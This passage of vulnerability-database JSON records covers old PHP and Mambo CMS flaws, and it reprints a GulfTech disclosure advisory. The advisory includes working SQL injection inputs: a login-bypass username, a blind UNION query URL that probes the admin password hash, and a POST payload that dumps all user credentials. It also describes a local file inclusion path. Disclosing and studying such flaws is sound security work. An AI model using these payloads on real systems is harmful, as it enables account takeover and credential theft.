local files, and ultimately execute code within the vulnerable Mambo Open Source installation. The problem lies in the _setTemplate() function not properly sanitizing GPC data. 
\r\n\r\n// TemplateChooser Start\r\n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' );\r\n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', $mos_user_template );\r\nif ($mos_change_template) {\r\n\t// check that template exists in case it was deleted\r\n\tif (file_exists( \"$mosConfig_absolute_path/templates/$mos_change_template/index.php\" )) {\r\n\t\t$lifetime = 60*10;\r\n\t\t$cur_template = $mos_change_template;\r\n\t\tsetcookie( \"mos_user_template\", \"$mos_change_template\", time()+$lifetime);\r\n\t} else {\r\n\t\tsetcookie( \"mos_user_template\", \"\", time()-3600 );\r\n\t}\r\n}\r\n\r\nAs seen in the above code, there are several unsanitized variables introduced into the function, and $mos_change_template in particular is ultimately set as the current template and used through out the application. There are never any effective traversal checks, so we can include arbitrary locations on the local machine, and in some cases execute arbitrary code as long as the file is named index.php (i.e. /tmp/index.php) The reason for the restrictions are because of the strip_tags call in mosGetParam, but some older versions of php do not use a binary safe strip_tags (CAN-2004-0595) which allows for null characters. So, in those cases the file inclusion is much more dangerous and easy to exploit. \r\n\r\n\r\nSolution:\r\nThere has been a new version of the Mambo software released to fix the previously mentioned vulnerabilities. \r\n\r\nhttp://mamboxchange.com/frs/?group_id=5 \r\n\r\nThe above link contains all of the relative patches as well as the secured full releases. Users are encouraged to upgrade their Mambo installations as soon as possible. 
\r\n\r\n\r\nCredits:\r\nJames Bercegay of the GulfTech Security Research Team", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43835/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "unix", "description": "\nStefan Esser of e-matters discovered that PHP's strip_tags()\n\t function would ignore certain characters during parsing of tags,\n\t allowing these tags to pass through. Select browsers could then\n\t parse these tags, possibly allowing cross-site scripting attacks.\n", "modified": "2013-06-19T00:00:00", "published": "2004-07-07T00:00:00", "id": "EDF61C61-0F07-11D9-8393-000103CCF9D6", "href": "https://vuxml.freebsd.org/freebsd/edf61c61-0f07-11d9-8393-000103ccf9d6.html", "title": "php -- strip_tags cross-site scripting vulnerability", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "unix", "description": "\nStefan Esser of e-matters discovered a condition within PHP\n\t that may lead to remote execution of arbitrary code.\tThe\n\t memory_limit facility is used to notify functions when memory\n\t constraints have been met. Under certain conditions, the entry\n\t into this facility is able to interrupt functions such as\n\t zend_hash_init() at locations not suitable for interruption.\n\t The result would leave these functions in a vulnerable state.\n\nAn attacker that is able to trigger the memory_limit abort\n\t within zend_hash_init() and is additionally able to control\n\t the heap before the HashTable itself is allocated, is able to\n\t supply his own HashTable destructor pointer. [...]\nAll mentioned places outside of the extensions are quite easy\n\t to exploit, because the memory allocation up to those places\n\t is deterministic and quite static throughout different PHP\n\t versions. 
[...]\nBecause the exploit itself consist of supplying an arbitrary\n\t destructor pointer this bug is exploitable on any platform.\n\n", "modified": "2004-10-02T00:00:00", "published": "2004-07-07T00:00:00", "id": "DD7AA4F1-102F-11D9-8A8A-000C41E2CDAD", "href": "https://vuxml.freebsd.org/freebsd/dd7aa4f1-102f-11d9-8a8a-000c41e2cdad.html", "title": "php -- memory_limit related vulnerability", "type": "freebsd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T17:19:31", "bulletinFamily": "exploit", "description": "**Name**| php_limit \n---|--- \n**CVE**| CVE-2004-0594 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| php_limit \n**Notes**| CVE Name: CVE-2004-0594 \nVENDOR: PHP \nOSVDB: \nRepeatability: Multiple tries \nReferences: http://security.e-matters.de/advisories/112004.html \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594 \nDate public: 2004/07/14 \nCVSS: 5.1 \n\n", "modified": "2004-07-27T04:00:00", "published": "2004-07-27T04:00:00", "id": "PHP_LIMIT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/php_limit", "title": "Immunity Canvas: PHP_LIMIT", "type": "canvas", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP strip_tags() function contains a flaw that may allow a malicious user to conduct a cross site scripting attack. The issue is triggered when the strip_tags()function fails to strip obfuscated HTML tags. It is possible that the flaw may result in a loss of integrity.\n## Solution Description\nUpgrade to PHP version 4.3.8 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## Short Description\nPHP strip_tags() function contains a flaw that may allow a malicious user to conduct a cross site scripting attack. The issue is triggered when the strip_tags()function fails to strip obfuscated HTML tags. It is possible that the flaw may result in a loss of integrity.\n## References:\nVendor URL: http://www.php.net\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-13.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:068)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000847)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_21_php4.html)\n[Secunia Advisory ID:12064](https://secuniaresearch.flexerasoftware.com/advisories/12064/)\n[Secunia Advisory ID:12081](https://secuniaresearch.flexerasoftware.com/advisories/12081/)\n[Secunia Advisory ID:12078](https://secuniaresearch.flexerasoftware.com/advisories/12078/)\n[Secunia Advisory ID:12149](https://secuniaresearch.flexerasoftware.com/advisories/12149/)\n[Secunia Advisory ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:14167](https://secuniaresearch.flexerasoftware.com/advisories/14167/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:12073](https://secuniaresearch.flexerasoftware.com/advisories/12073/)\n[Secunia Advisory ID:12106](https://secuniaresearch.flexerasoftware.com/advisories/12106/)\n[Secunia Advisory ID:12113](https://secuniaresearch.flexerasoftware.com/advisories/12113/)\n[Secunia 
Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:14828](https://secuniaresearch.flexerasoftware.com/advisories/14828/)\n[Secunia Advisory ID:12070](https://secuniaresearch.flexerasoftware.com/advisories/12070/)\n[Secunia Advisory ID:12116](https://secuniaresearch.flexerasoftware.com/advisories/12116/)\n[Related OSVDB ID: 7870](https://vulners.com/osvdb/OSVDB:7870)\nRedHat RHSA: RHSA-2004:395-10\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.437272\nOther Advisory URL: http://www.securiteam.com/unixfocus/5UP0C15DFI.html\nOther Advisory URL: http://security.e-matters.de/advisories/122004.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.debian.org/security/2005/dsa-669\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n[Nessus Plugin ID:13650](https://vulners.com/search?query=pluginID:13650)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0135.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 16692\n[CVE-2004-0595](https://vulners.com/cve/CVE-2004-0595)\n", "modified": "2004-07-13T17:55:25", "published": "2004-07-13T17:55:25", "href": "https://vulners.com/osvdb/OSVDB:7871", "id": "OSVDB:7871", "type": "osvdb", "title": "PHP strip_tags() Function Filter Bypass", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nThe PHP memory_limit function contains a flaw that may allow a malicious user to remotely execute arbitrary code. 
The issue is triggered when an attacker is able to trigger the memory_limit abort within the zend_hash_init() function. It is possible that the flaw may allow the attacker to control the heap, resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nUpgrade to version 4.3.8 or 5.0.0 or higher, as it has been reported to fix this vulnerability.\n## Short Description\nThe PHP memory_limit function contains a flaw that may allow a malicious user to remotely execute arbitrary code. The issue is triggered when an attacker is able to trigger the memory_limit abort within the zend_hash_init() function. It is possible that the flaw may allow the attacker to control the heap, resulting in a loss of confidentiality, integrity, and/or availability.\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-13.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:068)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000847)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_21_php4.html)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBOV01083)\n[Secunia Advisory ID:12064](https://secuniaresearch.flexerasoftware.com/advisories/12064/)\n[Secunia Advisory ID:12081](https://secuniaresearch.flexerasoftware.com/advisories/12081/)\n[Secunia Advisory ID:12078](https://secuniaresearch.flexerasoftware.com/advisories/12078/)\n[Secunia Advisory ID:12149](https://secuniaresearch.flexerasoftware.com/advisories/12149/)\n[Secunia Advisory 
ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:14167](https://secuniaresearch.flexerasoftware.com/advisories/14167/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:12073](https://secuniaresearch.flexerasoftware.com/advisories/12073/)\n[Secunia Advisory ID:12106](https://secuniaresearch.flexerasoftware.com/advisories/12106/)\n[Secunia Advisory ID:12113](https://secuniaresearch.flexerasoftware.com/advisories/12113/)\n[Secunia Advisory ID:13027](https://secuniaresearch.flexerasoftware.com/advisories/13027/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:12070](https://secuniaresearch.flexerasoftware.com/advisories/12070/)\n[Secunia Advisory ID:12116](https://secuniaresearch.flexerasoftware.com/advisories/12116/)\n[Related OSVDB ID: 7871](https://vulners.com/osvdb/OSVDB:7871)\nRedHat RHSA: RHSA-2004:395-10\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html\nOther Advisory URL: http://security.e-matters.de/advisories/112004.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.debian.org/security/2005/dsa-669\nOther Advisory URL: http://www.securiteam.com/unixfocus/5VP0D15DFO.html\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n[Nessus Plugin ID:13650](https://vulners.com/search?query=pluginID:13650)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0138.html\nKeyword: SCOSA-2005.49\nGeneric Exploit URL: http://www.felinemenace.org/~gyan/phpnolimit.c\n[CVE-2004-0594](https://vulners.com/cve/CVE-2004-0594)\n", "modified": "2004-07-14T07:39:05", "published": "2004-07-14T07:39:05", "href": "https://vulners.com/osvdb/OSVDB:7870", "id": 
"OSVDB:7870", "type": "osvdb", "title": "PHP memory_limit Function Arbitrary Code Execution", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:05", "bulletinFamily": "exploit", "description": "", "modified": "2006-02-26T00:00:00", "published": "2006-02-26T00:00:00", "href": "https://packetstormsecurity.com/files/44191/mambo453.txt.html", "id": "PACKETSTORM:44191", "type": "packetstorm", "title": "mambo453.txt", "sourceData": "`########################################################## \n# GulfTech Security Research February 24, 2006 \n########################################################## \n# Vendor : Miro International Pty Ltd \n# URL : http://www.mamboserver.com/ \n# Version : Mambo <= 4.5.3h \n# Risk : Multiple Vulnerabilities \n########################################################## \n \n \n \nDescription: \nMambo is a popular Open Source Content Management System \nreleased under the GNU General Public license (GNU GPL). \nThere are a number of security issues in Mambo which allows \nfor SQL Injection, Authentication Bypass, and possible remote \ncode execution via local file inclusion. There has been an \nupdated version of Mambo released and all users are advised \nto upgrade as soon as possible. Also, please note that these \nvulnerabilities are NOT related to any worms currently taking \nadvantage of vulnerable Mambo installations. \n \n \n \nSQL Injection: \nThere are several SQL Injection issues in Mambo Open Source. \nThe easiest to exploit of the issues allows an attacker to \nlogin as any user. The only info the attacker has to have is \nthe target username (if no user is specified, the first user \nfrom the users table will be selected instead). 
\n \n \nfunction login( $username=null,$passwd=null ) { \nglobal $acl; \n \n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' ); \n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' ); \nif (!$username || !$passwd) { \n$username = trim( mosGetParam( $_POST, 'username', '' ) ); \n$passwd = trim( mosGetParam( $_POST, 'passwd', '' ) ); \n$passwd = md5( $passwd ); \n$bypost = 1; \n} \n$remember = trim( mosGetParam( $_POST, 'remember', '' ) ); \n \nif (!$username || !$passwd) { \necho \"<script> alert(\\\"\"._LOGIN_INCOMPLETE.\"\\\"); window. \nhistory.go(-1); </script>\\n\"; \nexit(); \n} else { \n$this->_db->setQuery( \"SELECT id, gid, block, usertype\" \n. \"\\nFROM #__users\" \n. \"\\nWHERE username='$username' AND password='$passwd'\" \n); \n$row = null; \nif ($this->_db->loadObject( $row )) { \nif ($row->block == 1) { \necho \"<script>alert(\\\"\"._LOGIN_BLOCKED.\"\\\"); window. \nhistory.go(-1); </script>\\n\"; \nexit(); \n} \n// fudge the group stuff \n$grp = $acl->getAroGroup( $row->id ); \n$row->gid = 1; \n \nif ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) || \n$acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) { \n// fudge Authors, Editors, Publishers and Super Administrators \ninto the Special Group \n$row->gid = 2; \n} \n \n \nThe above code is from mosMainFrame class (/includes/mambo.php) \nand is the source of the previously mentioned problem. The \nfunction mosGetParam() for the most part just imports GPC \nvariables, and has no real effective filtering or the like, so \nseveral variables shown above contain unsanitized data. These \nvariables include $username, which is shortly thereafter passed \nto the query, thus allowing a user to bypass a login by supplying \na username of \"user'/*\" and any password. This is a very serious \nissue, but should prove easy to fix by either adding better \nfiltering in the mosGetParam() or sanitizing the data within the \nlogin() function, or both. 
If a malicious user is able to use this \nvulnerability to gain admin privileges then it is pretty much \ngame over as an attacker could then upload, and install a malicious \nmodule and execute any php code of their choice on the server. \n \nAnother issue with Mambo Open Source is data passed to the \nmosMenuCheck() function is usually unsanitized in regards to the \n$task parameter. \n \nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) { \nglobal $database; \n$dblink=\"index.php?option=$menu_option\"; \nif ($Itemid!=\"\" && $Itemid!=0) { \n$database->setQuery( \"SELECT access FROM #__menu WHERE id='$Itemid'\" ); \n} else { \nif ($task!=\"\") { \n$dblink.=\"&task=$task\"; \n} \n$database->setQuery( \"SELECT access FROM #__menu WHERE link like \n'$dblink%'\" ); \n} \n$results = $database->loadObjectList(); \n$access = 0; \n//echo \"<pre>\"; print_r($results); echo \"</pre>\"; \nforeach ($results as $result) { \n$access = max( $access, $result->access ); \n} \nreturn ($access <= $gid); \n} \n \nAs seen in the above code the unsanitized $task variable will be \nused in the query as long as $Itemid is empty. \n \nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20 \nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0 \n \nIf the first character from the password hash belonging to the \nuser \"admin\" is two as specified above then Mambo displays the \nerror \"You need to login\". This is an easy issue to exploit, \nand unfortunately mosMenuCheck() is called in the same unsafe \nmanner from other files as well. Last but not least there is an \nSQL Injection issue in the \"com_content\" component, particularly \nthe showCategory() function. 
\n \n// get the total number of published items in the category \n// filter functionality \n$filter = trim( mosGetParam( $_POST, 'filter', '' ) ); \n$filter = strtolower( $filter ); \n$and = ''; \nif ( $filter ) { \nif ( $params->get( 'filter' ) ) { \nswitch ( $params->get( 'filter_type' ) ) { \ncase 'title': \n$and = \"\\n AND LOWER( a.title ) LIKE '%\". $filter .\"%'\"; \nbreak; \ncase 'author': \n$and = \"\\n AND ( ( LOWER( u.name ) LIKE '%\". $filter .\"%' ) OR \n( LOWER( a.created_by_alias ) LIKE '%\". $filter .\"%' ) )\"; \nbreak; \ncase 'hits': \n$and = \"\\n AND a.hits LIKE '%\". $filter .\"%'\"; \nbreak; \n} \n} \n \n} \n \nAs you can see from the above code, the $filter variable is passed \nto the query completely unsanitized, and allows for easy to exploit \nSQL Injection. This is very dangerous. \n \nfilter=' UNION SELECT \n1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users \nWHERE \n1/*&order=rdate&limit=10&id=0&sectionid=&task=category&option=com_content \n \nThe above data sent in a post request to the vulnerable script will \neffectively dump every single username and password hash in the \ndatabase to the attacker. It should be noted that the above attacks are \nonly effective in the default php environment of magic_quotes_gpc off \n \n \n \nArbitrary File Inclusion: \nIt is possible to include arbitrary local files, and ultimately execute \ncode within the vulnerable Mambo Open Source installation. The problem \nlies in the _setTemplate() function not properly sanitizing GPC data. 
\n \n// TemplateChooser Start \n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' ); \n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', \n$mos_user_template ); \nif ($mos_change_template) { \n// check that template exists in case it was deleted \nif (file_exists( \n\"$mosConfig_absolute_path/templates/$mos_change_template/index.php\" )) { \n$lifetime = 60*10; \n$cur_template = $mos_change_template; \nsetcookie( \"mos_user_template\", \"$mos_change_template\", time()+$lifetime); \n} else { \nsetcookie( \"mos_user_template\", \"\", time()-3600 ); \n} \n} \n \nAs seen in the above code, there are several unsanitized variables \nintroduced into the function, and $mos_change_template in particular \nis ultimately set as the current template and used through out the \napplication. There are never any effective traversal checks, so we \ncan include arbitrary locations on the local machine, and in some \ncases execute arbitrary code as long as the file is named index.php \n(i.e. /tmp/index.php) The reason for the restrictions are because \nof the strip_tags call in mosGetParam, but some older versions of php \ndo not use a binary safe strip_tags (CAN-2004-0595) which allows for \nnull characters. So, in those cases the file inclusion is much more \ndangerous and easy to exploit. \n \n \n \nSolution: \nThere has been a new version of the Mambo software released to fix \nthe previously mentioned vulnerabilities. \n \nhttp://mamboxchange.com/frs/?group_id=5 \n \nThe above link contains all of the relative patches as well as the \nsecured full releases. Users are encouraged to upgrade their Mambo \ninstallations as soon as possible. 
\n \n \n \nCredits: \nJames Bercegay of the GulfTech Security Research Team \n \n \n \nRelated Info: \nThe original advisory can be found at the following location \nhttp://www.gulftech.org/?node=research&article_id=00104-02242006 \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/44191/mambo453.txt"}]}